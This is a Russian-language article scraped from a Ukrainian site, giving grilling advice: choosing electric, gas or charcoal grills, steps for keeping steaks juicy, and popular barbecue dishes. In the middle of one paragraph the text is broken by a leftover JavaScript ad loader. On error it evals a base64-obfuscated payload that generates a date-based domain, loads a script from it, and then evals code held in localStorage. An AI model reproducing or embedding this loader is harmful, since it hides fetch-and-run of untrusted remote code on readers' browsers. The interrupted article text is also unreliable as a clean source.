Кто хотя бы раз попробовал блюда, приготовленные на гриле, обязательно захочет повторить этот праздник вкуса. Аппетитная румяная корочка, легкий аромат дымка, рисунок решетки на сочном стейке – возбуждают аппетит.
Культура гриллинга зародилась в южных американских штатах. Простейшие рецепты обжарки мяса на гриле с годами усовершенствовались. Распространившийся по всему миру культ барбекю расширил свою рецептуру. Клубы и фестивали гриля позволяют сторонникам приготовления на углях обмениваться рецептами и угостить других блюдами на гриле с личными «секретными» ингредиентами.
Какой гриль нужен
Сегодня любителям барбекю производители грилей предлагаю агрегаты:
электрическиегазовыеугольные
Это могут быть компактные модели для кухни или пикника, стационарные установки для крупных ресторанов или кафе. Размер или модель гриля не влияет на качество приготовления. Достаточно желания, немного умения и гриль-барбекю воплотит в действительность самые смелые рецепты по приготовлению мяса. Для закрытых помещений рекомендуются электрические грили, при наличии вытяжки можно использовать газовые. Угольные грили идеальны для открытых площадок. Они немного более хлопотны в обслуживании, что компенсируется неповторимым ароматом дымка в готовых продуктах.
Тайны приготовления мяса
Самым популярным блюдом на гриле является мясо. У тех, кто не пробовал мясо на гриле бытует мнение, что под румяной корочкой скрывается сухая мякоть. Это не имеет ничего общего с действительностью. Равномерный жар внутри гриля способствует быстрому выделению сока, который «запирается» внутри стейка или ребрышек сочную ароматную структуру. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Несколько советов от гриль-повара помогут приготовить любое мясо сочным и полезным даже для тех, кто придерживается правильного питания:
разогреть гриль на максимальной мощности в течение 10-15 минут при закрытой крышкемясо замариновать и охладитьобсушить мясо при помощи бумажного полотенцаоптимальная температура для жарки стейков 230-260 °Cсмазать решетку растительным масломобжарьте мясо на решетке гриля с каждой стороны в течение 2-3 минут при открытой крышкепереложите мясо в зону непрямого жара и оставьте еще на 2-3 минуты мясо при закрытой крышкеготовое мясо снять с гриля и дать «отдохнуть» перед подачей в течение нескольких минут
Солить мясо лучше непосредственно перед жаркой, так как соль провоцирует выделения сока, а влага не способствует образованию румянца.
Лучшие рецепты мяса на гриле
Мясо на гриле можно жарить не только на открытых углях. Есть множество блюд приготовления в фольге, горшочках, глине и др. В ресторанах с гриль меню есть множество вариантов барбекю по рецептуре из всех уголков мира:
стейкиребрышкиптицушашлыклюля-кебабшефталяколбаски и многое другое
Любое из блюд, предложенных рестораторами можно с легкостью воплотить в домашних условиях. Важными ингредиентами в приготовлении мяса на гриле являются маринады и соусы. Благодаря маринадом мясо насыщается ароматом приправ, а соусы прекрасно подчеркивают и дополняют вкус готовых блюд.
(adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/kak-pravilno-zharit-myaso-na-grile/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook